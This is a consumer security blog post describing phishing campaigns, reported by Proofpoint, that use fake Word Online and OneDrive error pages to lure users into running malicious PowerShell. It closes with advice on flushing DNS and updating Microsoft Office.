More Old Wine In a New Bottle, Part 2:
Phishing Via Fake
Updates for Office Apps & Onedrive
In the same blog post cited in the previous article published by Proofpoint, dated June 17, 2024, a variation of the techniques used to trick users into running PowerShell commands are detailed. Here, malspam, is the attack vector. Like how malware is defined as "malicious software," malspam is current technopeak for "malicious spam." Uncle Sam, through HHS, offers a 25 page white paper on malspam.
To lure users into infecting their computers, a file attachment that resembles a Word document is attached to an email. Once opened, the fake page displays an error message that says the "Word Online extension" is not installed. Yet, as per Microsoft Copilot:
There doesn’t appear to be a standalone Word Online extension. Microsoft Word is part of the Microsoft 365 suite, and its online version is integrated within this suite.
Moreover, Microsoft states that the Office 365 extension was discontinued January 15th, 2024. Microsoft offers guidance on how to remove the extension.
When clicked upon, the malspam attachment documented by Proofpoint
displays what resembles a dimmed Word document. As shown above, in the middle of the screen is a dialog
box that states the nonexistent Word Online
extension is not installed. To proceed to read the fake Word doc,
the users must either click the "How to fix it" button to copy and paste the malware code
into Windows PowerShell. Likewise, the "autofix" button will open
PowerShell, and then download and run a dll file that will infect the
computer.
As recent as May 24, 2024, Proofpoint documented that a similar malspam campaign is afoot, but this time with a spoofed OneDrive file. The HTML attachment claims that there is a document that is hosted on OneDrive. OneDrive, however, is purported to be broken with a damaged DNS cache. Although the fake error message is different, the attack vector is the same. As Proofpoint detailed the process:
If the “How to fix” button was clicked, it copied a PowerShell script to the clipboard and provided instructions to the user on how to run it. This attack chain ultimately led to the installation of DarkGate malware.
To be clear, if OneDrive fails, the cause of the failure is most likely a bad network connection to the Internet and not with OneDrive itself. It should be noted that OneDrive is part of Windows. As such, the application needs little maintenance. Nonetheless, according to Microsoft, the most common reason for OneDrive to fail is a user's Microsoft (Office) 365 subscription has expired. Another reason OneDrive may fail is a DNS error that requires the DNS to be flushed. Again, from the same Microsoft page cited above, below are the steps to flush DNS as outlined and shown below. There is no need to launch PowerShell.
1. To flush the local systems DNS cache:
2. Select the Start
button.
3. Type cmd and open the Command Prompt app.
4. n the
Command Prompt window, enter the command ipconfig /flushdns.
5.
Select Enter on the keyboard.
6. Type "exit" to close the Command
Prompt app.
Most users of Word, Excel, Outlook, and/or PowerPoint have their own subscription to the Office suite of application through a Microsoft 365 subscription. Like with Google Chrome on the proceeding page, security aware Consumers should frequently check their Office installation for updates. Like I do with Chrome, I suggest users check for Office updates on a daily basis.
The short tutorial below is taken from an earlier Dispatch, dated March 04, 2023. It is, however, worth repeating. Personal information had been edited out, or "CENSORED." Lol.
| Open any Office
Application. I choose Word. From the Menu on the left, scroll down and click Account. |
 |
| When you come to the Account page, click the Update Options button.
And then click Update Now. |
 |
| Depending on the size of the update
and one's connection speed,
the update can take up to 15 minutes or more to install. That can seem like a month if you just sit and stare. Microsoft says you can continue working. I think, however, it would be a good time for lunch or coffee or whatever. But walk away from the computer. When you return, you will see this screen below. And both you and your computer will be happy. Simply close the application. |
 |
Whenever users take command, and thus responsibility, for keeping their software up to date, then the less likely users are to be duped by the shenanigans discussed in this post and the previous post.
The important take away, however, is follow the advice of Uncle Sam below.
Gerald Reiff
| Back to Top | ← previous post | next post → |
| If you find this article of value, please help keep the blog going by making a contribution at GoFundMe or Paypal | ||